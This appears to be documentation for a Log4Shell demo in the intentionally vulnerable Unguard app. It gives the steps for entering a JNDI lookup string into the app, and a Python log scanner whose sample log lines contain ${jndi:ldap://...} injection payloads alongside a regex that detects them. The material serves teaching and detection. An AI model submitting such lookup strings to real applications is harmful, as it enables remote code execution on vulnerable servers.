The JNDI features in some versions of the widely used Apache Log4j 2 logging framework do not protect against attacker-controlled LDAP and other JNDI-related endpoints. See CVE-2021-44228 and CVE-2021-45046 for more details.
For a simple demo, you need Unguard up and running.
- Go to the Log4Shell Vulnerability Test Tool and get a tailored lookup string to be entered into the demo application.
- Go to the Unguard demo app and log in.
- Enter the string copied from the test tool into the Share URL textbox and click post.
- The test tool will pick up the lookup / GET request for the payload and show the results.
For a more sophisticated setup that initiates a reverse shell connection, see this Log4Shell POC.
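To confirm on the defending side that the demo post reached the application, request logs can be scanned for JNDI lookup strings. The following is an added example, not part of Unguard or the test tool; the log line format, the `.example` hosts and the function names are assumptions, and it only covers the plain and URL-encoded forms of the lookup.

```python
import re
from urllib.parse import unquote

# Constructed sample request-log lines (assumed format: "<source ip> <method> <path> <body>").
# They are not Unguard output; hosts use the reserved .example TLD.
SAMPLE_LOG = [
    "10.0.0.5 POST /post url=https://blog.example/article",
    "10.0.0.9 POST /post url=${jndi:ldap://callback.example:1389/a}",
    "10.0.0.9 POST /post url=%24%7BJNDI%3Aldap%3A%2F%2Fcallback.example%2Fb%7D",
    "10.0.0.7 GET /timeline",
]

# ${jndi:<scheme>://<host>...} ; captures the JNDI scheme and the endpoint host.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s:]+)", re.IGNORECASE)


def fully_unquote(text, max_rounds=3):
    """Undo up to max_rounds layers of URL-encoding so encoded input is matched too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup string seen in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for match in JNDI_RE.finditer(fully_unquote(line)):
            findings.append({
                "line": lineno,
                "source": line.split()[0],         # first field is the client address
                "scheme": match.group(1).lower(),  # e.g. ldap
                "host": match.group(2).lower(),    # endpoint the lookup points at
            })
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit only shows that a lookup string was submitted; whether the lookup was resolved depends on the Log4j version and configuration in use.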